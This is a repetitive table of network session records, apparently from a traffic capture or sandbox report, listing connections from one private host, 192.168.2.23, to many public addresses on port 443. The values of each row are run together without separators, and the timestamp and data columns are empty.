                                                17506192.168.2.2359282100.63.38.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17507192.168.2.2352740193.66.207.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17508192.168.2.23599185.156.200.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17509192.168.2.235926642.86.64.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17510192.168.2.235586676.234.31.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17511192.168.2.234674832.107.89.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17512192.168.2.234672467.5.10.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17513192.168.2.2336006158.49.210.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17514192.168.2.235785459.86.230.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17515192.168.2.2333190126.229.179.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17516192.168.2.234409899.216.94.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17517192.168.2.2353130113.4.186.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17518192.168.2.2359784188.143.190.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17519192.168.2.233533448.141.50.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17520192.168.2.234885638.242.220.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17521192.168.2.2336632135.236.146.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17522192.168.2.2337634104.72.10.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17523192.168.2.233545878.237.146.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17524192.168.2.2335642162.30.66.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17525192.168.2.2335334173.23.150.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17526192.168.2.235192654.185.19.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17527192.168.2.233692688.193.98.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17528192.168.2.235766887.181.150.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17529192.168.2.2340078130.102.247.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17530192.168.2.2341708109.93.69.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17531192.168.2.2348366223.253.6.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17532192.168.2.235501891.161.10.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17533192.168.2.234628088.46.189.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17534192.168.2.2348318111.78.250.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17535192.168.2.2360004223.232.126.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17536192.168.2.2357128162.176.49.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17537192.168.2.23442241.67.104.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17538192.168.2.23508181.160.237.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17539192.168.2.236094287.122.125.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17540192.168.2.2344942144.170.53.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17541192.168.2.2340470221.85.235.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17542192.168.2.233976681.162.242.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17543192.168.2.2359838101.64.54.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17544192.168.2.2354410110.85.58.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17545192.168.2.234619884.45.134.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17546192.168.2.234984448.110.167.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17547192.168.2.2340132220.88.122.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17548192.168.2.233787423.23.39.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17549192.168.2.2351820138.10.192.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17550192.168.2.234207260.189.126.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17551192.168.2.2334652196.121.75.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17552192.168.2.2353378165.83.77.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17553192.168.2.2343988122.161.247.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17554192.168.2.2348310154.167.199.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17555192.168.2.235011617.198.225.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17556192.168.2.2348588191.9.198.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17557192.168.2.2335670213.200.111.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17558192.168.2.2349348118.47.244.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17559192.168.2.2346460188.32.195.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17560192.168.2.233717013.26.240.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17561192.168.2.235877276.199.11.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17562192.168.2.235282073.101.52.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17563192.168.2.23490145.95.151.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17564192.168.2.2348500157.245.7.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17565192.168.2.235157439.126.199.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17566192.168.2.2351216136.196.208.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17567192.168.2.2344796180.131.204.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17568192.168.2.2356770168.47.189.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17569192.168.2.2340950126.39.86.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17570192.168.2.23567929.162.187.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17571192.168.2.235221657.105.41.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17572192.168.2.2351036165.6.103.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17573192.168.2.23524728.105.73.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17574192.168.2.2358610149.236.125.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17575192.168.2.2352298136.122.38.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17576192.168.2.2347072114.74.192.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17577192.168.2.2341426174.35.134.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17578192.168.2.235682470.34.172.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17579192.168.2.2335112146.221.236.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17580192.168.2.2358788122.212.101.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17581192.168.2.2341648117.7.0.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17582192.168.2.2352914100.162.62.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17583192.168.2.2344478201.5.249.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17584192.168.2.234674667.158.42.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17585192.168.2.235384282.211.59.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17586192.168.2.235322299.64.119.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17587192.168.2.2354360212.70.91.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17588192.168.2.233914887.118.40.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17589192.168.2.2358574160.51.191.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17590192.168.2.234790495.30.105.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17591192.168.2.2358684114.173.214.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17592192.168.2.2354040133.37.59.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17593192.168.2.235866460.197.59.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17594192.168.2.235501290.101.85.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17595192.168.2.2335014106.87.121.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17596192.168.2.2345504208.113.30.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17597192.168.2.2360884105.34.154.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17598192.168.2.234655470.218.97.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17599192.168.2.235537824.101.213.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17600192.168.2.2358678150.199.65.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17601192.168.2.2340986177.240.90.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17602192.168.2.2348726187.171.163.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17603192.168.2.2354060137.30.59.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17604192.168.2.2359900196.234.4.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17605192.168.2.2337728139.192.106.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17606192.168.2.2334304219.172.99.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17607192.168.2.235195264.110.182.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17608192.168.2.2355922188.30.16.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17609192.168.2.2338602138.139.179.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17610192.168.2.234539048.6.10.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17611192.168.2.234404095.106.2.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17612192.168.2.235047639.210.48.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17613192.168.2.233404034.130.191.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17614192.168.2.235148612.169.221.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17615192.168.2.235591214.97.227.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17616192.168.2.2353290152.164.6.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17617192.168.2.2339888162.40.119.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17618192.168.2.236089625.30.117.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17619192.168.2.235742614.211.117.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17620192.168.2.2339712119.81.93.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17621192.168.2.2337974164.132.134.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17622192.168.2.2338970150.3.28.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17623192.168.2.235561068.135.107.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17624192.168.2.23533925.11.209.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17625192.168.2.235740652.84.55.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17626192.168.2.2337840188.118.103.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17627192.168.2.2352328183.81.39.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17628192.168.2.2339650103.48.23.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17629192.168.2.234587240.165.76.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17630192.168.2.234370497.138.149.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17631192.168.2.236018275.10.194.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17632192.168.2.2335608222.224.165.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17633192.168.2.2351374171.243.90.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17634192.168.2.233346025.136.214.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17635192.168.2.2352976167.66.132.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17636192.168.2.2355266153.232.255.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17637192.168.2.234563450.99.170.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17638192.168.2.235669652.241.168.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17639192.168.2.2334794197.63.193.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17640192.168.2.2348640128.130.129.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17641192.168.2.2357662152.88.58.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17642192.168.2.236064440.82.56.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17643192.168.2.233933014.143.184.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17644192.168.2.236079673.80.199.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17645192.168.2.2333006136.104.80.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17646192.168.2.2353128142.156.141.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17647192.168.2.2345144174.87.7.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17648192.168.2.2338694104.131.139.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17649192.168.2.236082478.19.167.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17650192.168.2.234376634.69.155.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17651192.168.2.2344934198.111.79.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17652192.168.2.235900617.216.140.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17653192.168.2.2358260107.33.128.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17654192.168.2.233371267.224.68.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17655192.168.2.23570149.149.142.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17656192.168.2.2344896212.177.185.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17657192.168.2.2342674152.42.158.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17658192.168.2.2359136189.140.52.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17659192.168.2.2351652146.172.35.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17660192.168.2.2353760192.27.16.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17661192.168.2.2355054138.154.186.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17662192.168.2.234490644.156.236.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17663192.168.2.234567696.126.64.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17664192.168.2.234764834.118.132.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17665192.168.2.2359142147.103.82.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17666192.168.2.2353484167.172.127.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17667192.168.2.2348890118.97.82.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17668192.168.2.2351978197.74.140.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17669192.168.2.233575670.179.162.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17670192.168.2.2334628114.152.108.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17671192.168.2.2345584162.76.123.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17672192.168.2.2357840208.45.198.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17673192.168.2.2346640167.0.57.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17674192.168.2.2335142173.217.229.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17675192.168.2.235726835.65.173.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17676192.168.2.2337190164.81.212.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17677192.168.2.233920279.166.187.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17678192.168.2.2333174114.231.234.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17679192.168.2.2345348174.221.26.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17680192.168.2.2338504142.141.85.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17681192.168.2.2354206199.180.246.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17682192.168.2.235037814.2.235.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17683192.168.2.235260213.38.2.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17684192.168.2.2332842199.88.253.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17685192.168.2.2335894198.148.162.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17686192.168.2.23493628.128.222.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17687192.168.2.23331949.88.222.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17688192.168.2.233460612.236.131.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17689192.168.2.2336306154.105.55.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17690192.168.2.234054640.90.7.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17691192.168.2.2338048212.81.67.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17692192.168.2.2356722157.22.62.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17693192.168.2.2357128183.114.110.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17694192.168.2.2335114180.212.224.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17695192.168.2.2344112121.153.119.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17696192.168.2.233980263.77.0.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17697192.168.2.2333914139.0.122.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17698192.168.2.23449602.29.240.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17699192.168.2.2346642136.26.237.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17700192.168.2.233831612.201.174.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17701192.168.2.234566870.215.222.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17702192.168.2.2349042178.28.233.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17703192.168.2.235061632.144.2.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17704192.168.2.233393620.19.121.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17705192.168.2.2353152120.21.94.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17706192.168.2.2337042155.44.209.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17707192.168.2.233991083.30.118.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17708192.168.2.2344600115.220.247.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17709192.168.2.235412068.157.224.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17710192.168.2.2357996119.47.243.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17711192.168.2.234943076.159.133.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17712192.168.2.233628231.89.40.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17713192.168.2.234733846.182.66.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17714192.168.2.233350819.178.214.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17715192.168.2.2359010181.225.79.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17716192.168.2.2352788176.93.166.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17717192.168.2.235558493.72.67.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17718192.168.2.2358854203.235.23.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17719192.168.2.235898231.125.31.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17720192.168.2.23435042.90.103.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17721192.168.2.235106457.54.12.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17722192.168.2.233577057.59.57.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17723192.168.2.233499812.119.195.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17724192.168.2.2338074112.96.69.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17725192.168.2.2357952176.20.255.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17726192.168.2.233418872.58.196.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17727192.168.2.234217034.225.30.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
